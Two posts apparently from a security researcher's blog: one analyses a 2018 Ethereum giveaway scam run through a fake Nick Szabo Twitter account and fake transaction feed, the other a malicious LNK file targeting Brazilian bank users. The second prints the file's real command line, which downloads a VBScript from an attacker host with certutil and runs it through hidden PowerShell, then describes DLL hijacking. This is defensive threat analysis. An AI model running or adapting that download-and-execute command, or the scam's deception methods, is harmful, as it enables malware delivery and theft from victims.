Friday, 22 June 2018

Ethereum Give Away Hack using Twitter

There's an ongoing Ethereum cryptocurrency give away scam which asks the users to donate Ethereum amounts in the range 0.5 to 20 ETH and assures them 10 times return in exchange.

While this clearly sounds like an attempt to steal your coins, the attack is carried out in a very clever way.

The attacker created a fake Twitter profile of Nick Szabo using the same profile photo as the legitimate profile.

Real Twitter profile of Nick Szabo: https://twitter.com/NickSzabo4

Fake Twitter profile of Nick Szabo: https://twitter.com/YIuReNhO0V84h6B


 Figure 1

The next trick used by the attacker was to carefully choose a famous and recent tweet of Nick Szabo and comment on that tweet with details of the malicious scam as shown below:


 Figure 2

Nick Szabo's Tweet on June 21st: https://twitter.com/NickSzabo4/status/1009890204474208256

Attacker commented on this tweet with details of their scam campaign here: https://twitter.com/YIuReNhO0V84h6B/status/1009894333292666886

In order to make the tweet of the Attacker more legitimate, we can see that the tweet has 39 likes (at the time of writing).

If we expand the list of users who liked that tweet, we can see a long list of accounts with Russian usernames and each of these accounts have no tweets. This indicates that these accounts were registered by the attacker.


Figure 3 

Now, let's have a look at the website set up by the attacker to collect Ethereum.

Domain name: https://event-eth.org/
SSL Certificate from Let's Encrypt.

The website is well crafted and looks legitimate.

It includes the Ethereum address to which the users need to donate along with a QR image. All this is done to make the site look as authentic as possible.

Ethereum address of attacker: 0x1e2B6F23d0d22aa4D84FC0d417507f25c8CB9190


Figure 4

If we scroll down further on the page, it shows a bar which is used to highlight the progress of this campaign in real time. It tells how many ETH tokens are remaining to be earned.


Figure 5
 
And it also shows a list of transactions along with details of the transaction to highlight the following:

1. Sender address
2. Receiver address
3. Transcation ID
4. Amount sent

This part of the web page is crafted in a very clever way as well. If you click on the transaction ID or the addresses, you will observe that it's not possible to fetch the complete details. That's because the attacker has crafted these details only to convince the visitor that these are real transactions going on.

In addition to this, to make this look even more convincing, the values are updated in this part of the webpage in such a way that for each pair of transaction, the second transaction is 10 times the value of the first transaction.

Please be careful and aware of such attacks which are well crafted to steal Ethereum coins.

I will update more details of this attack in a follow up post.

c0d3inj3cT
0x1e2B6F23d0d22aa4D84FC0d417507f25c8CB9190
0x1e2B6F23d0d22aa4D84FC0d417507f25c8CB9190
0x1e2B6F23d0d22aa4D84FC0d417507f25c8CB9190

Tuesday, 12 June 2018

LNK Files targeting Banking Users in Brazil

On June 8th 2018, I found an interesting instance of a LNK file which was used to target Banking users in the Brazil region.

ZIP File Hash: e8cf34e5b319769da611441cfee9f6f5
Filename: 001745-Tabela-Preco-Fipe.lnk
MD5 hash: ea31baebb8b99ddd858865098e704521

The LNK file has the Target set as shown below:

C:\Windows\System32\cmd.exe /V /C certutil.exe -urlcache -split -f "hxxp://www.aapxommkbfwaxwnngwasvipsoaaqhiqcavibutioyxcaivucabputn.palestraeducativas.info/08-06-2018m/pls.vbs" %temp%\pls.vbs && cd %temp% && rename "pls.vbs" "NjPrcgTKRDVWtxrpwMEMXUgWzVQ.vbs && powershell.exe -WindowStyleHidden -Command wscript NjPrcgTKRDVWtxrpwMEMXUgWzVQ.vbs

The above command line performs the following main operations:

1. Downloads a VBScript from the URL: hxxp://www.aapxommkbfwaxwnngwasvipsoaaqhiqcavibutioyxcaivucabputn.palestraeducativas.info/08-06-2018m/pls.vbs. The file download and drop is performed using certutil.

2. Renames the dropped VBScript from pls.vbs to NjPrcgTKRDVWtxrpwMEMXUgWzVQ.vbs

3. Executes the VBScript using wscript which is invoked by powershell.exe

Analysis of the VBScript

Since the attack is targeted towards Brazilian Banking Users,  several checks are performed by the VBScript before continuing the execution.

Checks for the presence of following directories on the File System:

%PROGRAMFILES%\Diebold
%PROGRAMFILES%\AppBrad
%APPDATA%\..\Local\Aplicativo Itau
C:\Sicoobnet

If any of the above paths do not exist on the machine, then VBScript will terminate the execution.

If the above checks are passed, then it continues to perform the following main actions:

1. Downloads a ZIP file from the URL: hxxp://www.aapxommkbfwaxwnngwasvipsoaaqhiqcavibutioyxcaivucabputn.palestraeducativas.info/08-06-2018m/iWaPZOE.zip
2. Extracts the contents of the ZIP file to %temp% directory.
3. Renames the executable from iWaPZOE.exe to a randomly generated name. The DLL file is renamed from: RrpzTAc.dll to IVIEWERS.dll
4. Executes the downloaded binary.

DLL Hijacking

The downloaded binary is an OLEView application and the DLL with the name, IVIEWERS.dll is used to perform DLL hijacking. During runtime, IVIEWERS.dll is dynamically loaded by OLEView application. Since the downloaded version of IVIEWERS.dll is malicious, it results in DLL hijacking.

I'll post more details of the malicious activities performed by the DLL in a follow up post.

c0d3inj3cT